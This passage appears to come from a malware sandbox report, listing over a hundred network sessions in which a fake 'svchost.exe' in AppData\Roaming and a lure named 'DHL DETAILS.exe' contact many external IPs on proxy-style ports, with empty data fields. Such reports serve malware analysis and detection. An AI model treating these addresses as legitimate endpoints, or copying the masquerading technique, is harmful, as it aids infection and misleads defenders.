Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6775	192.168.2.5	62206	121.164.200.18	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6776	192.168.2.5	58281	162.223.94.164	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6777	192.168.2.5	58181	186.159.3.193	56861	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6778	192.168.2.5	60585	59.153.158.190	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6779	192.168.2.5	64695	45.81.232.17	61553	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6780	192.168.2.5	62236	91.134.140.160	9141	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6781	192.168.2.5	62385	104.16.106.234	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6782	192.168.2.5	62258	184.185.2.12	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6783	192.168.2.5	62261	174.138.114.226	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6784	192.168.2.5	58163	171.250.222.13	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6785	192.168.2.5	62246	202.162.219.10	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6786	192.168.2.5	62276	54.248.238.110	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6787	192.168.2.5	59335	103.76.253.66	3129	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6788	192.168.2.5	62256	43.131.246.77	15673	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6789	192.168.2.5	62416	146.190.51.181	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6790	192.168.2.5	60960	165.227.196.37	61899	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6791	192.168.2.5	60989	92.204.134.38	56177	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6792	192.168.2.5	58384	103.35.189.217	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6793	192.168.2.5	62467	192.154.244.92	9000	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6794	192.168.2.5	64806	162.241.6.97	45629	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6795	192.168.2.5	60971	92.204.135.37	62969	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6796	192.168.2.5	62290	23.137.248.197	8888	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6797	192.168.2.5	62304	51.15.247.93	16379	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6798	192.168.2.5	62376	18.135.211.182	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6799	192.168.2.5	60994	34.84.95.189	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6800	192.168.2.5	62361	188.166.17.18	8881	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6801	192.168.2.5	62331	123.56.1.50	3129	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6802	192.168.2.5	62404	3.10.93.50	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6803	192.168.2.5	62356	45.6.38.24	8080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6804	192.168.2.5	62371	177.72.82.9	5678	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6805	192.168.2.5	62517	104.23.126.8	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6806	192.168.2.5	62418	47.91.65.23	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6807	192.168.2.5	62431	51.75.126.150	19693	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6808	192.168.2.5	62358	95.111.227.164	53625	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6809	192.168.2.5	62445	80.67.8.6	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6810	192.168.2.5	59435	83.221.222.240	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6811	192.168.2.5	62468	130.162.213.175	3129	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6812	192.168.2.5	61353	93.188.161.84	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6813	192.168.2.5	62554	162.241.158.204	60651	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6814	192.168.2.5	62460	194.182.178.90	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6815	192.168.2.5	62539	50.63.12.33	9367	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6816	192.168.2.5	62529	104.17.37.235	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6817	192.168.2.5	62469	115.239.234.43	7302	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6818	192.168.2.5	62574	162.159.241.160	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6819	192.168.2.5	62475	94.177.106.178	2324	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6820	192.168.2.5	62457	222.255.238.159	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6821	192.168.2.5	61610	92.204.134.38	25675	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6822	192.168.2.5	61472	181.78.19.242	999	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6823	192.168.2.5	62446	203.171.19.98	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6824	192.168.2.5	62462	138.36.150.16	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6825	192.168.2.5	62451	202.139.198.15	3030	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6826	192.168.2.5	62504	18.166.142.180	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6827	192.168.2.5	61566	51.89.173.40	11058	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6828	192.168.2.5	61465	59.15.28.76	3128	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6829	192.168.2.5	62544	119.28.4.112	9999	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6830	192.168.2.5	62552	94.30.152.172	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6831	192.168.2.5	62536	182.106.220.252	9091	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6832	192.168.2.5	61490	159.223.71.71	51213	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6833	192.168.2.5	59477	84.47.145.189	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6834	192.168.2.5	60926	142.54.235.9	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6835	192.168.2.5	60884	192.252.216.81	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6836	192.168.2.5	62562	43.133.70.57	15673	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6837	192.168.2.5	62572	203.19.38.114	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6838	192.168.2.5	62646	104.16.109.143	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6839	192.168.2.5	62645	192.154.244.92	9000	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6840	192.168.2.5	62486	5.44.42.115	58386	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6841	192.168.2.5	62631	66.228.140.209	8899	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6842	192.168.2.5	62576	20.111.54.16	8123	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6843	192.168.2.5	62657	45.12.30.231	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6844	192.168.2.5	61077	43.255.113.232	8081	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6845	192.168.2.5	61255	46.105.42.230	3128	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6846	192.168.2.5	61140	64.76.106.18	8080	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6847	192.168.2.5	61315	37.187.77.58	49507	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6848	192.168.2.5	61411	72.167.221.145	50335	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6849	192.168.2.5	61276	171.247.204.98	8080	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6850	192.168.2.5	61387	51.158.64.130	16379	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6851	192.168.2.5	61425	161.97.173.42	62289	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6852	192.168.2.5	61450	94.23.220.136	40767	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6853	192.168.2.5	61313	197.243.20.187	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6854	192.168.2.5	61395	172.232.111.247	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6855	192.168.2.5	61866	165.227.196.37	63399	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6856	192.168.2.5	61461	103.97.179.115	1080	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6857	192.168.2.5	62664	104.24.193.186	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6858	192.168.2.5	61899	121.171.57.2	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6859	192.168.2.5	62567	103.49.202.252	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6860	192.168.2.5	62593	60.190.68.154	7302	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6861	192.168.2.5	62649	38.162.8.232	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6862	192.168.2.5	62594	120.79.101.0	8888	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6863	192.168.2.5	61685	210.72.11.46	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6864	192.168.2.5	62009	189.240.60.163	9090	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6865	192.168.2.5	62013	192.163.200.196	59559	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6866	192.168.2.5	58623	45.117.179.179	17827	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6867	192.168.2.5	62641	121.164.200.18	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6868	192.168.2.5	49605	52.151.210.204	9000	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6869	192.168.2.5	62640	8.222.164.205	15673	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6870	192.168.2.5	62620	183.230.162.122	9091	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6871	192.168.2.5	64994	91.142.222.84	12266	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6872	192.168.2.5	62086	60.188.102.225	18080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6873	192.168.2.5	62076	139.198.120.15	29527	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6874	192.168.2.5	62686	23.137.248.197	8888	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6875	192.168.2.5	62691	18.135.211.182	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6876	192.168.2.5	62680	43.131.246.77	15673	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6877	192.168.2.5	62688	51.15.247.93	16379	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6878	192.168.2.5	62684	195.90.216.75	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6879	192.168.2.5	64653	181.129.183.19	53281	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6880	192.168.2.5	62724	104.18.81.76	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6881	192.168.2.5	62747	104.17.50.45	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6882	192.168.2.5	62766	162.159.242.62	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6883	192.168.2.5	62678	202.162.219.10	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6884	192.168.2.5	62070	103.146.137.5	1081	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6885	192.168.2.5	62744	147.124.212.31	13276	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6886	192.168.2.5	62668	94.131.14.66	1081	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6887	192.168.2.5	65120	95.84.166.138	8080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6888	192.168.2.5	65162	91.214.31.234	8080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6889	192.168.2.5	62858	45.144.30.205	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6890	192.168.2.5	62864	45.144.30.205	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6891	192.168.2.5	62698	178.49.22.23	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6892	192.168.2.5	62867	45.144.30.205	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6893	192.168.2.5	62868	45.144.30.205	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6894	192.168.2.5	62787	107.175.37.178	43029	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6895	192.168.2.5	65379	162.240.208.98	43704	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6896	192.168.2.5	64881	132.148.154.98	50965	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6897	192.168.2.5	64898	102.132.49.12	8080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6898	192.168.2.5	62133	162.241.6.97	31794	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6899	192.168.2.5	62753	81.161.229.72	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6900	192.168.2.5	65070	51.161.33.206	44523	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6901	192.168.2.5	65089	162.241.46.40	41442	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6902	192.168.2.5	62721	80.67.8.6	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6903	192.168.2.5	62734	217.182.129.103	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6904	192.168.2.5	59892	199.58.185.9	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6905	192.168.2.5	62827	46.51.249.135	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6906	192.168.2.5	62901	31.7.65.18	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6907	192.168.2.5	62903	31.7.65.18	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6908	192.168.2.5	62904	31.7.65.18	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6909	192.168.2.5	62906	31.7.65.18	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6910	192.168.2.5	58705	104.248.158.78	61725	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6911	192.168.2.5	65041	101.133.162.23	8899	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6912	192.168.2.5	62181	47.96.145.14	8888	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6913	192.168.2.5	62810	115.239.234.43	7302	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6914	192.168.2.5	62842	119.28.4.112	9999	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6915	192.168.2.5	62831	138.36.150.16	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
